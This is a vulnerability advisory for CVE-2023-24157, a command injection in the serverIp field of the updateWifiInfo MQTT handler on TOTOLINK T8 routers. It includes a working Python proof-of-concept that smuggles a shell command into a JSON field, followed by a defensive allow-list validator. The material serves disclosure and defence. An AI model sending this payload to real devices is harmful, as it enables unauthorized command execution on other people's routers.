CVE-2023-24157: CVE-vulns/updateWifiInfo.md at main · Double-q1015/CVE-vulns

A command injection vulnerability in the serverIp parameter in the function updateWifiInfo of TOTOLINK T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

A command injection vulnerability in the function updateWifiInfo of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

In the function updateWifiInfo, the "serverIp" parameter is not filtered, so user input in it can cause command injection.

import paho.mqtt.client as mqtt

client = mqtt.Client()
client.connect("192.168.0.1",1883,60)
client.publish("totolink/router/updateWifiInfo", b'{"newMd5":"1","serverIp":";ls>/tmp/updateWifiInfo.txt;"}')
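As an added example (not part of the original advisory and not vendor code), one way to screen messages on this topic at a broker hook or gateway is to accept `serverIp` only when it parses as a strict dotted-quad IPv4 literal. The function names and the benign sample values are assumptions made for illustration, as is the premise that the field is meant to hold an IPv4 address.

```python
import ipaddress
import json

# Topic and field name are taken from the proof of concept on this page.
TOPIC = "totolink/router/updateWifiInfo"


def check_update_wifi_info(topic, payload):
    """Return (ok, reason) for one MQTT PUBLISH given its topic and payload bytes."""
    if topic != TOPIC:
        return True, "other topic"
    try:
        msg = json.loads(payload.decode("utf-8"))
    except ValueError:  # covers UnicodeDecodeError and JSONDecodeError
        return False, "payload is not valid UTF-8 JSON"
    if not isinstance(msg, dict):
        return False, "payload is not a JSON object"
    server_ip = msg.get("serverIp")
    # IPv4Address() also accepts ints and 4-byte values, so require a string.
    if not isinstance(server_ip, str):
        return False, "serverIp missing or not a string"
    try:
        # IPv4 only: IPv6 literals may carry a free-form "%scope" suffix.
        ipaddress.IPv4Address(server_ip)
    except ValueError:
        return False, "serverIp is not an IPv4 literal"
    return True, "ok"


def rejected(messages):
    """Return the (topic, payload, reason) tuples that fail the check."""
    out = []
    for topic, payload in messages:
        ok, reason = check_update_wifi_info(topic, payload)
        if not ok:
            out.append((topic, payload, reason))
    return out


# Constructed sample traffic; the second payload is the one shown on this page.
SAMPLES = [
    (TOPIC, b'{"newMd5":"1","serverIp":"192.168.0.10"}'),
    (TOPIC, b'{"newMd5":"1","serverIp":";ls>/tmp/updateWifiInfo.txt;"}'),
    (TOPIC, b'{"newMd5":"1","serverIp":3232235521}'),
    (TOPIC, b'{"newMd5":"1"'),
]

if __name__ == "__main__":
    for topic, payload, reason in rejected(SAMPLES):
        print(f"REJECT {topic}: {reason}: {payload!r}")
```

Allow-listing the expected format is used here instead of deny-listing shell metacharacters, so anything that is not an address is rejected regardless of which characters it contains.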
